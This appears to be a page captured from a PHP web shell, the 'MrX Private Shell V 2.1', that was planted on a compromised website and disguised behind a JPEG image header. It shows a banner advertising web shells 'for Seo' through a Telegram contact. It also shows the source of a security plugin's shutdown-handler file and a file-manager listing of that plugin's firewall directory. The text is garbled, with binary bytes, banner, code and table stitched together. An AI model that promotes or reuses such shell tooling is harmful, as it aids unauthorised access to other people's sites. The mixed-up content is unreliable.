����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
class wfShutdownFunction {
private $callable;
private $priority;
public function __construct($callable, $priority) {
$this->callable = $callable;
$this->priority = $priority;
}
public function invoke() {
call_user_func($this->callable);
}
public function getPriority() {
return $this->priority;
}
public function __wakeup() {
$this->callable = function() {};
}
}
class wfShutdownRegistry {
private static $instance = null;
const PRIORITY_LAST = 100;
private $functions = array();
private $registered = false;
public function handleShutdown() {
usort($this->functions, function ($a, $b) {
return $a->getPriority() - $b->getPriority();
});
foreach ($this->functions as $function) {
$function->invoke();
}
}
public function register($function, $priority = 50) {
array_push($this->functions, new wfShutdownFunction($function, $priority));
$this->registerSelf();
}
private function registerSelf() {
if (!$this->registered) {
register_shutdown_function(array($this, 'handleShutdown'));
$this->registered = true;
}
}
public function __wakeup() {
$this->functions = array();
$this->registered = false;
}
public static function getDefaultInstance() {
if (self::$instance === null)
self::$instance = new self();
return self::$instance;
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| parser | Folder | 0755 |
|
|
| storage | Folder | 0755 |
|
|
| api.php | File | 1.73 KB | 0644 |
|
| config.php | File | 2.14 KB | 0644 |
|
| http.php | File | 10.53 KB | 0644 |
|
| i18n.php | File | 1.4 KB | 0644 |
|
| json.php | File | 30.21 KB | 0644 |
|
| request.php | File | 32.58 KB | 0644 |
|
| rules.php | File | 45.7 KB | 0644 |
|
| shutdown.php | File | 1.29 KB | 0644 |
|
| storage.php | File | 1.85 KB | 0644 |
|
| utils.php | File | 41.19 KB | 0644 |
|
| view.php | File | 2.27 KB | 0644 |
|
| waf.php | File | 69.63 KB | 0644 |
|
| xmlrpc.php | File | 8.99 KB | 0644 |
|